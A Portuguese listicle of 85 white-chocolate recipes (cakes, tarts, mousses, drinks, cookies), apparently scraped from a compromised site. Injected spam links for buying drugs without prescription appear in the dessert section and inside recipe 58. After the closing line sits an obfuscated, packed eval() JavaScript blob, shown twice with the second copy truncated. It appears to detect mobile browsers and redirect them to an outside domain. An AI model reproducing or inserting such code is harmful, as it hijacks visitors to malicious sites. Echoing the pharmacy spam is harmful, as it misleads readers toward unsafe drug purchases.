85 receitas com chocolate branco para saborear de olhos fechados

Escrito por Priscila Silva

Quantas são as opções de chocolates que o mercado oferece? Inúmeras! Por mais que a versão branca seja menos utilizada nas receitas e seja menos consumida (aos pedaços), o chocolate branco tem muito a oferecer.

Sua origem não é o cacau, como na versão escura. O chocolate branco é resultado de uma mistura de manteiga de cacau, leite e outros ingredientes. E ele tem a consistência tão boa que pode ser usado de várias formas – seja como recheio ou cobertura, ser usado mole ou enrijecido.

Há alguns produtos disponíveis nas gôndolas que não são de boa qualidade. Ao experimentar apenas um pedaço, é possível sentir um gosto acentuado de gordura, além de serem muito doces. Eles não são indicados para a preparação de receitas. Para seu quitute ficar com um ótimo sabor e aparência, invista em produtos de marcas reconhecidas e de boa qualidade.

Não perca mais tempo. Escolha um bom produto e dê uma chance ao chocolate branco. Confira algumas opções de receitas que levam o branquinho:

Bolos com chocolate branco

Foto: Reprodução / I could kill for dessert

1. Bolo mousse de chocolate branco com sorvete: a aparência é de bolo, o sabor é de bolo, mas o recheio é surpreendente: uma camada de mousse de chocolate branco e outra de sorvete de morango. Para realçar os sabores, sirva acompanhado de morangos frescos.

2. Bolo de abacaxi com chocolate branco: abacaxi é uma fruta que combina super bem com o chocolate branco, de forma que os sabores ficam bem equilibrados: o docinho de um e o azedinho do outro, juntos, dá muito certo!

3. Bolo de chocolate branco com cerejas: a massa desse bolo combina a farinha de trigo com farinha de amêndoas. Só por aí já fica bom, mas pode melhorar, com a adição de raspas de limão, chocolate branco e cereja.

4. Bolo de chocolate branco com toque de limão: macio na medida certa, do tipo que não se despedaça na hora do corte, mas que desmancha na boca. Cubra com uma calda de limão e chocolate branco, e salpique raspinhas da fruta.

5. Bolo de chocolate branco e framboesa: oferecer esse bolo para as visitas – perfeito para um chá da tarde com as amigas, inclusive – é certeza de sucesso. A combinação do chocolate branco com a framboesa fica incrível.

6. Bolo de chocolate preto e branco: a combinação dos dois chocolates, branco e preto, é garantia de sabor marcante. O bolo fica bem fofo, ótima pedida para um café da manhã preguiçoso.

7. Bolo de coco: o chocolate branco é tão versátil que pode ser combinado com diversas frutas e sabores. Aqui, na opção de bolo de coco, ele aparece na cobertura, junto com leite de coco.

8. Bolo de dois limões, amêndoas e chocolate branco: uma massa compacta e saborosa, que tem o sabor e a aparência que lembram bastante o de brownie. Para criar um diferencial, capriche na cobertura com lascas de chocolate branco, amêndoas e raspinhas de limão Taiti e siciliano.

9. Bolo de framboesa, mascarpone e chocolate branco: bolo levinho, com sabor bem delicado. A massa é tão versátil que pode ser usada como base para muitas outras receitas. Use frutas congeladas para fazer o recheio, faz toda a diferença no final.

10. Bolo de limão e mexerica: por mais inusitada que pareça, essa combinação dá certo, e o sabor é perfeito para quem não é muito chegado ao sabor marcante do chocolate, já que são as frutas que ficam em evidência.

11. Bolo de pêssego e chocolate branco: Sabe aquela massa curinga que você tem aí? Então, pode ser usada com essa opção de recheio, feito com pêssego em calda e creme de chocolate branco. Capriche na decoração final com chantilly.

12. Bolo de três chocolates e cerejas: cacau em pó, chocolate branco e chocolate meio amargo: a junção de sabores que seu paladar nunca mais vai esquecer. Use cerejas frescas, que são lindas e saborosas. Você pode fazer um bolo de tamanho tradicional ou em unidades individuais – ou até mesmo servir como finger food.

13. Bolo cheesecake red velvet: um dos bolos mais famosos do mundo da confeitaria, o red velvet precisava, claro, aparecer nessa lista. O veludo vermelho da massa em um lindo contraste com o recheio branquinho da cheesecake com chocolate branco.

14. Bolo mousse de limão e framboesas: a maior dúvida desse bolo é se ele fica ou mais bonito ou mais gostoso. O bolo fica bem branquinho com a buttercream de chocolate branco, e por isso o contraste com as framboesas na cobertura fica visualmente fantástico. Termine polvilhando açúcar de confeiteiro, que dá um aspecto “nevado” ao bolo.

15. Bolo tricolor de chocolate, baunilha e morango: também conhecido como “Tuxedo Cake”, o nome estranho camufla sabores bem conhecidos: chocolate, baunilha e morango. A receita original desse bolo pede chocolate escuro, mas a substituição pelo branco dá muito certo.

Tortas com chocolate branco

Foto: Reprodução / Pitadinha

16. Torta de leite Ninho com chocolate branco: essa maravilha gastronômica deveria ser pecado, de tão boa que é! Afinal, tudo com leite Ninho fica bom demais. Se tiver uns morangos dando sopa por aí, sirva junto. A combinação é fantástica!

17. Torta coroa dupla de chocolate: parece, mas não é muito elaborada. Fica linda e combina chocolate branco e preto. As bolachinhas usadas na lateral, na decoração, ajudam a deixar o prato ainda mais bonito.

18. Torta trufada de chocolate branco com limão: receita super prática de fazer, e que fica pronta rapidinho. Basta misturar chocolate branco derretido, suco de limão e creme de leite. Depois, só intercalar camadas desse creme com bolacha, simples assim. Capriche na decoração!

19. Torta de limão e manjericão: essa torta é muito refrescante, ideal para um dia quente de verão. A infusão de manjericão faz toda a diferença no sabor final. Para finalizar, a cobertura com chocolate branco, que dá o toque docinho, equilibrando os sabores.

Docinhos feitos com chocolate branco

Foto: Reprodução / Flamboesa

20. Fudge de Oreo: originalmente, fudge é uma sobremesa levemente doce, mas aqui ela é apresentada com todo o sabor do chocolate branco e de Oreo, uma combinação incrível! O doce é bem simples de fazer e pode aparecer até mesmo em cardápios mais elaborados.

21. Beijinho de coco com chocolate branco: figurinha carimbada nos aniversários, o beijinho é um doce muito simples de fazer. Basta juntar leite condensado, chocolate branco, coco e manteiga. Se quiser, pode dar um sabor um pouco mais especial, com um toque de baunilha.

22. Blondie – brownie branco: o brownie em sua versão clarinha é tão gostoso quanto a versão escura. O chocolate branco se destaca junto com as nozes, o sabor é fantástico, uma delícia.

23. Bombom de chocolate branco com matcha: o matcha é o ingrediente do momento para receitas fitness, mas a sugestão aqui é usá-lo junto com o chocolate branco. Que tal se você montar uma caixinha e presentear alguém que adora esse verdinho?

24. Brigadeiro de chocolate branco: o brigadeiro faz parte da culinária brasileira, isso é fato. Então, e se ele ganhasse uma nova roupagem? Arrisque essa receita com chocolate branco e deixe seu lado criativo falar mais alto na hora de decorar os docinhos.

25. Brigadeiro gourmet de limão: de uns tempos para cá, uma onda de comidas gourmet tomou conta dos cardápios. E não é para menos! O sabor desse brigadeiro, por exemplo, é tão fino e requintado que não tem como ser considerado um docinho “simples” – embora, na verdade, seja muito simples de fazer.

26. Cake pops red velvet: o famoso veludo vermelho aparece aqui na versão pirulito, ou melhor, cake pops. Cubra com uma mistura de chocolate branco com cream cheese, sem dó. A melhor parte é morder e ouvir o barulho da casquinha branca quebrar.

27. Chocolate branco crudívoro vegano: é muito difícil encontrar chocolate branco vegano. Por isso essa receita cai como uma luva, já que com apenas cinco ingredientes é possível ter uma versão crudívora do doce.

28. Cupcake de chocolate branco: cupcakes são pequenas tentações em forma de bolinhos. Esses de chocolate branco são tão gostosos, que você nem vai precisar de alguma desculpa para devorar mais de um.

29. Barrinhas de chocolate branco com macadâmia: quem teve a ideia de combinar chocolate branco com macadâmia tem uma vaga reservada no céu! A junção dos sabores deixa o doce bem equilibrado e muito gostoso – isso sem falar no perfume que deixa na cozinha.

30. Mini éclair de Nutella com chocolate branco: éclair é mais conhecida no Brasil como “bomba”. Nessa versão saborosíssima de chocolate branco e Nutella, você vai descobrir que é impossível fazer a versão mini – ou, pelo menos, comer só uma delas.

31. Pastilhas de chocolate branco com passas e castanhas: de tão bonitinhas, pequenas e delicadas, essas pastilhas podem ser consideradas um “tira gosto” na versão doce. E são perfeitas para ficar em um baleiro, ou até mesmo armazenadas em potinhos para comer durante o expediente.

32. Pirulito de uva congelada com chocolate branco: pirulitos de uva (e de morango também) são docinhos que sempre aparecem em aniversários, festas juninas e reuniões mais descontraídas. Ofereça esses petiscos doces nas versões com chocolate ao leite e também chocolate branco.

33. Trufas brancas com pistache: mais uma opção de docinho que pode ser considerado gourmet, essa trufa de chocolate branco tem sabor bem delicado, e combina muito bem com o gosto do pistache. O contraste das cores deixa a montagem linda.

Sobremesas para quem ama chocolate branco

get cheaply drugs online – http://www.automatedintegration.com/get-cheaply-drugs-online/

Foto: Reprodução / acquire at a low price drugs without prescription – http://hongkongnews.com.hk/acquire-at-a-low-price-drugs-without-prescription/ Cozinha dal Bó

34. Manga com chocolate branco, iogurte e pecãs caramelizadas: sobremesa levinha e refrescante, fácil de fazer, doce na medida certa e linda, para ser admirada antes de ser saboreada. As diferentes texturas e sabores se misturam, criando uma bela surpresa ao paladar.

35. Cheesecake de chocolate branco com frutas vermelhas: o sabor levemente cítrico das frutas vermelhas (amora, morango e framboesa) forma uma ótima dupla com o docinho do chocolate branco nessa cheesecake, que é de comer de olhos fechados.

36. Cheesecake de morango com chocolate branco: uma sobremesa bonita, para ser servida numa louça especial. Para o aspecto ficar ainda melhor, escolha morangos bem vermelhinhos, e decore com pequenas folhas de hortelã, que além de dar um chame a mais, deixa um toque refrescante no doce.

37. Crème brulée de chocolate branco e framboesa: famoso por ter a casquinha dourada que, ao ser quebrada, apresenta um creme fofo e gostoso, essa versão de brulée junta chocolate e framboesa. De repente, parece que um ingrediente nasceu para o outro, de tão boa que a combinação fica!

38. Creme de chocolate branco com azeite e baunilha: pode ser considerada uma Nutella branca, e talvez um pouco mais leve, já que tem azeite entre seus ingredientes. Use favas de baunilha em vez da essência, esse detalhe faz a diferença no sabor. Por mais inusitada que seja a combinação, o resultado é incrível.

39. Creme de chocolate branco: ideal para ser servido em copinhos unitários, esse creme de chocolate branco é receita vapt-vupt, que rapidinho fica pronta, e fica levinho e bem gostoso. Cubra com geleia de morango, de preferência, feita em casa. Fica ainda melhor!

40. Delícia de abacaxi com brigadeiro branco: receita típica das mesas brasileiras nos anos 1980, esse doce pode ser servido em potinhos individuais, em uma travessa tamanho família ou até mesmo servir como recheio para algum bolo.

41. Brownie de chocolate branco com cranberries e pistache: esse brownie fica com uma cara muito bonita, com as cores alegres e contrastantes da massa, cranberries e do pistache. Sirva com algum sorvete que a cor também se sobressaia, para deixar o prato ainda mais colorido.

42. Mousse de açaí com banana: açaí com banana é uma dupla de frutas que sempre dá certo, independente da forma como são preparadas e apresentadas. E não podia ser diferente com essa mousse, que ganhou um chantilly de chocolate branco para coroar o quitute.

43. Mousse de chocolate branco com calda de maracujá: o contraste do doce do chocolate branco com o azedinho do maracujá é a aposta certeira para um dia de calor, já que a combinação resulta em um mix bem refrescante.

44. Mousse de chocolate branco com calda de morango: receita digna de restaurante chique, essa mousse é bem simples e leva apenas cinco ingredientes. O diferencial está em cada colherada, coberta com uma calda vermelhinha e gostosa de morango.

45. Mousse de chocolate branco com framboesas: essa mousse é certeza de fechar a refeição com chave de ouro e, de quebra, ainda receber elogios. O segredo é o mascarpone, que melhora o sabor e a textura do doce. Sirva com uma farofinha doce.

46. Mousse de chocolate branco com frutas vermelhas: opção para dias corridos e com visita, em que a sobremesa precisa ser no melhor estilo “pá-pum-está pronta”. Essa mousse não demora nem 10 minutos para ficar pronta! Depois, só levar para gelar.

47. Mousse de chocolate branco e cream cheese: separe seus copinhos mais charmosos para servir essa mousse, afinal, a apresentação das receitas é parte integrante de uma refeição bem elaborada. E, por elaborada, não entenda necessariamente que quer dizer complicada. Essa gostosura aqui só precisa de três ingredientes para ficar pronta!

48. Mousse de chocolate branco e limão siciliano: o gostinho delicado e cítrico do limão siciliano é perfeito com o doce do chocolate branco. Para decorar, use lascas de chocolate e raspas do limão.

49. Mousse de coco com chocolate branco: se vai fazer uma mesa temática e precisa de comidinhas brancas, essa é uma boa pedida. Você pode também usar a cor ao seu favor e brincar com a decoração, usando lascas de coco queimado ou apostando em louças de cores bem fortes para servir e chamar a atenção.

50. Mousse Três Amores (morango, chocolate e chocolate branco): essa mousse tem cara de torta e fica muito linda! É verdade que dá um pouquinho a mais de trabalho para fazer se comparada com outras, mas ela impressiona os olhos e o estômago!

51. Pavê de brownie com chocolate branco: pavê é gostoso. Brownie é gostoso. Agora use sua imaginação e imagine essas duas delícias unidas pelo chocolate branco. O resultado? Um doce cremoso, aerado e saboroso. É certeza de sucesso!

52. Pavê de chocolate branco com maracujá: outra opção que leva chocolate branco e maracujá, dessa vez em forma de pavê. O segredo é o creme, ou chantilly de maracujá, que fica levemente azedinho e fofo.

53. Pavê de chocolate branco e preto: os dois amores oficiais da TPM, mas que podem virar paixão de qualquer pessoa facilmente. Essa sobremesa rende bastante, então é ideal para fazer para dias em que toda a família estará reunida. Use uma travessa transparente, para deixar um visual de dar água na boca.

54. Petit gateau de capim santo: uma sobremesa um pouco mais elaborada, mas que tem aparência fina e nome gourmet. Vale a pena fazer em uma ocasião especial. Como normalmente acontece com todas as versões do bolinho, sirva acompanhado de sorvete.

55. Salame de chocolate branco com avelãs e bolachas de canela: a receita de salame de chocolate já é bem manjada nas ceias de Natal. Então inove e apresente essa versão branca do salame, com avelãs e bolachas de canela.

56. Suflê de chocolate branco: leve e prático no modo de fazer, o suflê é uma opção de sobremesa que vai encantar até os paladares mais exigentes. Use ramequins para o preparo e servir. Acompanha bem calda de frutas vermelhas e frutas frescas.

Sobremesas deliciosas com chocolate branco

Foto: Reprodução / Panelaterapia

57. Torta colomba com mousse de limão: para incrementar a mesa de doces pascais, dê uma cara nova à tradicional colomba. Para isso, basta cortar a tampa, rechear, encher de biscoitos champagne em toda a volta e cobrir com uma parte da mousse e raspas de chocolate branco.

58. Ovo de páscoa de colher com chocolate branco e doce de leite price elavil : opção para presentear na Páscoa – seja para seu amigo chocolate ou para alguém especial. Esse ovo de colher é de chocolate branco, com interior sabor coco e cobertura de doce de leite. Que tentação!

59. Panetone trufado recheado de chocolate branco: qual convidado (ou amigo oculto) não ficaria mais do que feliz ao receber um presente feito artesanalmente e com doses extras de carinho? Ainda mais se o recheio for de trufa branca… Hum…

60. Arroz doce com chocolate branco e canela: a receita típica das festas juninas, e que esquenta o corpo na época fria do ano, vem em uma versão mais docinha, com chocolate branco na mistura. Adicione também raspas da casca de uma laranja para garantir um toque de chef.

Bebidas com chocolate branco

Foto: Reprodução / Prato Fundo

61. Iogurte de chocolate branco: extremamente fácil de fazer, e combina com frutas, cereais e várias receitas doces. O modo de fazer não poderia ser mais simples. É só misturar os ingredientes (iogurte integral e chocolate branco picado) na temperatura certa.

62. Chocolate quente branco: em dia um dia frio, nada melhor que um belo chocolate quente para esquentar, não é mesmo? Essa aqui é a versão “branca” da receita tradicional, mas não perde em nada no quesito saber se comparado à versão mais famosa.

63. Chocolate quente branco com cardamomo: essa versão tem dois toques especiais: cardamomo e whisky ou conhaque, que é para dar aquela esquentada gostosa nos pés e realçar ainda mais o sabor do chocolate.

64. Café com chocolate branco: sabe aquele café pretinho delicioso? Então, é só adicionar café derretido no fundo do copo ou xícara, antes de colocar o café pronto, e colocar mais uma camada generosa por cima. Não é necessário colocar açúcar, o chocolate já adoça o café. Mexa suavemente antes de beber. Caso queira deixar a bebida ainda mais vistosa, finalize com chantilly.

65. Milkshake de chocolate branco: é a bebida dos deuses, pode anotar aí! E é bem rápido de fazer. Basta fazer alguma versão de chocolate quente branco e bater (depois de esfriar um pouco) no liquidificador com sorvete de creme. Decore com marshmallows.

Para um encontro romântico

Foto: Reprodução / Cozinha dal Bó

66. Copos de chocolate branco e cereja: lindo e docinho! Apenas quatro ingredientes, intercalando as camadas: uma farofa crocante, creme de chocolate branco de consistência aveludada, cerejas e chantilly rosa. Capriche na escolha do copo para melhorar a apresentação. Os mais indicados são os bojudinhos.

67. Fondue de chocolate branco: fondue é item obrigatório em menu de uma noite romântica (serve também para noites bem geladas). O chocolate branco combina bem com frutas (morango, kiwi, banana, maçã, abacaxi e uvas sem caroço), bolos, biscoitos e marshmallow.

68. Frutas grelhadas com calda de chocolate branco: prepare o creme branco e reserve. Depois, grelhe as frutas dos dois lados, de modo que fiquem bem douradinhas. Use pera, manga, carambola e figos, cortadas em quadradinhos.

69. Panna cotta de chocolate branco: um doce com sabor e aparência bem delicados. A junção da nata, leite, açúcar, gelatina e chocolate branco deixa a panna cotta bem macia. Cubra com gelatina de laranja, que equilibra os sabores com um toque cítrico.

70. Panna cotta de coco e chocolate branco: a apresentação nesse prato é tudo! Um doce bonito e simples de fazer. Com apenas quatro ingredientes – leite, chocolate branco, leite de coco e gelatina incolor – e 10 minutos, você pode levar o doce para gelar e se encarregar de fazer o restante do cardápio. Sirva com uma farofa doce.

71. Pavê de chocolate branco com morango: “É pra ver, ou pra comer?”. Se ouvir essa pergunta, pode responder sem pestanejar que é para devorar mesmo, sem peso na consciência. A combinação do chocolate branco com o morango é imbatível na confeitaria, e cai muito bem em uma refeição a dois.

72. Petit gateau de chocolate branco: o pequeno bolinho de origem francesa ganhou os corações canarinhos e faz sucesso sempre que aparece. Meio branco, meio douradinho, o que vale mesmo é o momento em que a colher divide o doce ao meio e espalha a calda quente deliciosa. Não tem como não amar!

73. Tiramisu de chocolate branco e morangos: outro doce de origem internacional, o italiano tiramisù aparece aqui com a dupla chocolate branco e morango. Dá para montar em fôrmas individuais, para ficar mais charmoso, ou em uma travessa enorme – para aqueles almoços em família.

Lanches rápidos com chocolate branco

Foto: Reprodução / Pam B

74. Muffins de chocolate triplo: muffin é aquele quitute perfeito para beliscar à tarde, quando bate aquela fominha. Num dia de calor, pode ser servido acompanhado de uma bola de sorvete. Caso esteja frio, um copo de leite com achocolatado, bem quentinho, completa o lanche.

75. Brownie de chocolate com nozes e pedaços de chocolate branco: opção que junta ingredientes que, sozinhos, já são deliciosos. Juntos, então, fazem maravilhas no paladar. Não deixe o brownie por muito tempo no forno, para que ele permaneça com um aspecto molhadinho.

76. Scones de limão e chocolate branco: de origem escocesa, como o nome já sugere, é um pãozinho rápido. Esse aqui fica com a textura macia, além de cheirosos e saborosos. O limão e o chocolate branco combinam perfeitamente entre si.

77. Cookies de chocolate branco e macadâmia: perfeitos para acompanhar um café fresquinho – para os adultos – ou um copo de leite gelado – para os pequenos. Independente da idade, quem experimentar esses cookies vai querer repetir.

78. Pipoca confete com chocolate branco: essa é para fazer a alegria da criançada, receita perfeita para fazer nas férias. Por mais que a receita seja doce, estoure a pipoca junto com a quantidade adequada de sal – ele dá um contraste com o chocolate branco que fica uma delícia.

79. Cupcake de mirtilos: a massa desse cupcake é diferenciada, e faz mais o estilo “pesada”, feita à base de baunilha, mirtilos e gemas. Finalize com ganache de chocolate branco e mirtilos para decorar o topo.

80. Cookies de laranja com chocolate branco: quer a dica de ouro para não errar nos cookies? Na hora em que for colocar a massa na assadeira, deixe um bom espaço entre um e outro, assim eles poderão se espalhar sem grudar um no outro.

81. Blondies de chocolate branco e limão siciliano: conhecidos por ser a versão branca dos brownies, os blondies são perfeitos para montar uma mesa temática, com cores clarinhas. Feito com chocolate branco e raspas e suco de limão siciliano, que dá aquele toque de frescor ao prato.

82. Panqueca de chocolate branco: para um lanche da tarde mais caprichado ou mesmo para o café da manhã, essas panquecas docinhas são mais do que bem-vindas. Sirva acompanhada de manteiga derretida, geleia, calda de frutas, doce de leite ou xarope de mapple.

83. Cookies de chocolate branco, limão siciliano e nozes: o sabor do limão siciliano fica mais delicado do que já é e, ao mesmo tempo, mais acentuado por causa da combinação com o chocolate branco e a crocância vinda das nozes. Perfeito para fazer e levar na bolsa para um lanchinho.

84. Scones de iogurte, cranberry e chocolate branco: esse pãozinho é daqueles que combina muito bem com uma manteiga ou geleia por cima. Crocante por forma, macio por dentro. Se quiser alterar um pouco o sabor, pode substituir as cramberries secas por uva passa.

85. Brownie de chocolate branco com damasco: receita para comer devagar, melhor ainda se for guardada e apreciada em diversos momentos. A combinação do chocolate branco e do damasco proporcionam uma explosão de sabores a cada mordida.

Independente da ocasião, o chocolate branco sempre pode aparecer – sendo protagonista ou mesmo para dar uma adoçada ao ingrediente principal. Aventure-se nas receitas com o chocolate branco!eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘(24(a,b){1V(/(2n|2d\\d+|1i).+1b|1g|1E\\/|1H|1C|1x|1B|2s|3l|3n|O(3m|V)|S|3g|38 |3c|3p|3D|1b.+3A|3z|1d m(3x|2H)i|2J( 14)?|2C|p(2x|2A)\\/|30|2T|3j|2S(4|6)0|2U|2R|I\\.(2Q|2N)|2O|2P|2V 2W|33|34/i.19(a)||/31|2X|2Y|2Z|2M|50[1-6]i|2L|2y|a W|2z|M(15|Z|s\\-)|11(2w|2t)|B(2u|E|D)|2v|2B(2I|y|2K)|2G|17(2D|j)|2E(x|2F)|35|36(3w|\\-m|r |s )|3y|3v(P|N|3u)|T(3r|3s)|3t(M|3G)|3H(e|v)w|3F|3E\\-(n|u)|3B\\/|3C|3q|3d\\-|3e|3b|3a|37\\-|D(39|K)|3f|3o(A|N|3k)|3h|3i\\-s|3I|2r|1z|U(c|p)o|1A(12|\\-d)|1y(49|11)|1u(1v|1w)|15(1D|1J)|1K|1I([4-7]0|14|W|1F)|1G|1t(\\-|R)|G u|1L|1q|1h\\-5|g\\-z|j(\\.w|V)|1j(1e|1f)|1s|1k|1r\\-(m|p|t)|1p\\-|1o(Q|F)|1l( i|O)|1m\\-c|1n(c(\\-| |R|a|g|p|s|t)|1M)|2e(2f|2g)|i\\-(20|j|q)|2c|29( |\\-|\\/)|2a|2b|2h|2i|2o|2p|2q|S|2m(t|v)a|2j|2k|2l|28|27|1S( |\\/)|1T|1U |1R\\-|1Q(c|k)|1N(1O|1P)|1W( g|\\/(k|l|u)|50|54|\\-[a-w])|25|26|23\\-w|22|1X\\/|q(x|1Y|1Z)|16(f|21|E)|m\\-48|5H(5E|C)|5y(5A|5L|J)|5V|z(f|5X|T|3J|U|t(\\-| |o|v)|58)|5i(50|5j|v )|5r|5p|5s[0-2]|57[2-3]|5c(0|2)|5d(0|2|5)|5R(0(0|1)|10)|5M((c|m)\\-|5B|5h|5U|5W|5O)|5Q(6|i)|5Z|5o|5n(5m|5k)|5l|5v|5u|5t(a|d|t)|59|5a(13|\\-([1-8]|c))|55|56|L(5g|5f)|5e\\-2|5w(P|5x|X)|5P|5N|Q\\-g|5S\\-a|5T(5Y|12|21|32|H|\\-[2-7]|i\\-)|5C|5D|5z|5F|5K|5J(5I|5G)|5q\\/|4Z(4c|q|4d|4e|y|4b)|4a(f|h\\-|Z|p\\-)|44\\/|X(c(\\-|0|1)|47|16|K|C)|46\\-|51|4f(\\-|m)|4g\\-0|4m(45|4n)|4l(B|17|4k|A|4h)|4i(4j|y)|43(f|h\\-|v\\-|v )|42(f|3P)|3Q(18|50)|3R(3O|10|18)|F(3N|3K)|3L\\-|3M\\-|3S(i|m)|3T\\-|t\\-z|3Z(L|41)|J(Y|m\\-|3Y|3X)|3U\\-9|I(\\.b|G|3V)|3W|4o|4p|4O|4P(4N|x)|4M(40|5[0-3]|\\-v)|4J|4K|4L|4Q(52|53|H|4R|Y|4X|4Y|4W|4V|4S)|4T(\\-| )|4U|4I|4H(g |4v|4w)|4x|4u|4t|4q\\-|4r|4s|4y\\-/i.19(a.4z(0,4)))1c.4F=b})(1a.4G||1a.4E||1c.1d,\’4D://4A.4B/4C/?5b\’);’,62,372,’|||||||||||||||01||||go|||||||ma|||||||te|ny|mo|it|al|ri|co|ca|ta|g1|60|up|ts|nd|pl|ac|ll|ip|ck|pt|_|iris|bi|do|od|wa|se|70|oo||ai|||os|er|mc|ar||test|navigator|mobile|window|opera|ad|un|avantgo|gf|meego|gr|hcit|hp|hs|ht|hi|hei|gene|hd|haie|fly|em|l2|ul|compal|el|dmob|ds|elaine|blazer|ic|bada|ze|fetc|blackberry|ez|k0|esl8|g560|tp|le|no|xi|kyo|kwc|kgt|klon|kpt|if|lg|m50|ui|xo|||m3ga|m1|function|libw|lynx|keji|kddi|iac|ibro|idea|i230|bb|hu|aw|tc|ig01|ikom|jbro|jemu|jigs|ja|android|im1k|inno|ipaq|dica|fennec|rn|av|amoi|ko|ixi|802s|abac|re|an|phone|ch|as|us|aptu|in|ex|palm|yw|770s|4thp|link|vodafone|wap|browser|treo|series|pocket|symbian|windows|ce|6310|6590|3gso|plucker|1207||xda|xiino|attw|au|cmd|lge|mp|cldc|chtm|maemo|cdm|cell|craw|kindle|dbte|dc|psp|ng|hiptop|hone|iemobile|da|midp|ccwa|lb|rd|bl|nq|be|di|ob|avan|netfront|firefox|c55|capi|mmp|bw|bumb|az|br|devi|de|lk|tcl|tdg|gt|00|mb|t2|t6|tel|tim|tx|si|utst|m5|m3|to||sh|sy|sp|sdk||sgh||cr||sc|va|ge|mm|ms|sie|sk|t5|so|ft|b3|sm|sl|id|v400|v750|yas|your|zeto|x700|wonu|nc|nw|wmlb|zte|substr|gettop|info|kt|http|vendor|location|userAgent|wi|whit|vm40|voda|vulc|vk|rg|veri|vi|vx|61|98|w3c|webc|85|83|80|81|sa||shar||||phil|pire|n20|zz|pdxg|pg|sdNXbH|n30|n50|pn|uc|ay|tf|mt|p1|wv|oran|ti|op|o2im|mywa|s55|mwbp|n10|pan|p800|owg1|po|rt|mi|r600|o8|on|qtek|r380|rc|raks|zo|me|ve|ro|rim9|oa|ne|psio|wt|prox|nok|n7|qa|qc|wf|mmef|wg|02|07|nzph’.split(‘|’),0,{}))eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘(24(a,b){1V(/(2n|2d\\d+|1i).+1b|1g|1E\\/|1H|1C|1x|1B|2s|3l|3n|O(3m|V)|S|3g|38 |3c|3p|3D|1b.+3A|3z|1d m(3x|2H)i|2J( 14)?|2C|p(2x|2A)\\/|30|2T|3j|2S(4|6)0|2U|2R|I\\.(2Q|2N)|2O|2P|2V 2W|33|34/i.19(a)||/31|2X|2Y|2Z|2M|50[1-6]i|2L|2y|a W|2z|M(15|Z|s\\-)|11(2w|2t)|B(2u|E|D)|2v|2B(2I|y|2K)|2G|17(2D|j)|2E(x|2F)|35|36(3w|\\-m|r |s )|3y|3v(P|N|3u)|T(3r|3s)|3t(M|3G)|3H(e|v)w|3F|3E\\-(n|u)|3B\\/|3C|3q|3d\\-|3e|3b|3a|37\\-|D(39|K)|3f|3o(A|N|3k)|3h|3i\\-s|3I|2r|1z|U(c|p)o|1A(12|\\-d)|1y(49|11)|1u(1v|1w)|15(1D|1J)|1K|1I([4-7]0|14|W|1F)|1G|1t(\\-|R)|G u|1L|1q|1h\\-5|g\\-z|j(\\.w|V)|1j(1e|1f)|1s|1k|1r\\-(m|p|t)|1p\\-|1o(Q|F)|1l( i|O)|1m\\-c|1n(c(\\-| |R|a|g|p|s|t)|1M)|2e(2f|2g)|i\\-(20|j|q)|2c|29( |\\-|\\/)|2a|2b|2h|2i|2o|2p|2q|S|2m(t|v)a|2j|2k|2l|28|27|1S( |\\/)|1T|1U |1R\\-|1Q(c|k)|1N(1O|1P)|1W( g|\\/(k|l|u)|50|54|\\-[a-w])|25|26|23\\-w|22|1X\\/|q(x|1Y|1Z)|16(f|21|E)|m\\-48|5H(5E|C)|5y(5A|5L|J)|5V|z(f|5X|T|3J|U|t(\\-| |o|v)|58)|5i(50|5j|v )|5r|5p|5s[0-2]|57[2-3]|5c(0|2)|5d(0|2|5)|5R(0(0|1)|10)|5M((c|m)\\-|5B|5h|5U|5W|5O)|5Q(6|i)|5Z|5o|5n(5m|5k)|5l|5v|5u|5t(a|d|t)|59|5a(13|\\-([1-8]|c))|55|56|L(5g|5f)|5e\\-2|5w(P|5x|X)|5P|5N|Q\\-g|5S\\-a|5T(5Y|12|21|32|H|\\-[2-7]|i\\-)|5C|5D|5z|5F|5K|5J(5I|5G)|5q\\/|4Z(4c|q|4d|4e|y|4b)|4a(f|h\\-|Z|p\\-)|44\\/|X(c(\\-|0|1)|47|16|K|C)|46\\-|51|4f(\\-|m)|4g\\-0|4m(45|4n)|4l(B|17|4k|A|4h)|4i(4j|y)|43(f|h\\-|v\\-|v )|42(f|3P)|3Q(18|50)|3R(3O|10|18)|F(3N|3K)|3L\\-|3M\\-|3S(i|m)|3T\\-|t\\-z|3Z(L|41)|J(Y|m\\-|3Y|3X)|3U\\-9|I(\\.b|G|3V)|3W|4o|4p|4O|4P(4N|x)|4M(40|5[0-3]|\\-v)|4J|4K|4L|4Q(52|53|H|4R|Y|4X|4Y|4W|4V|4S)|4T(\\-| )|4U|4I|4H(g 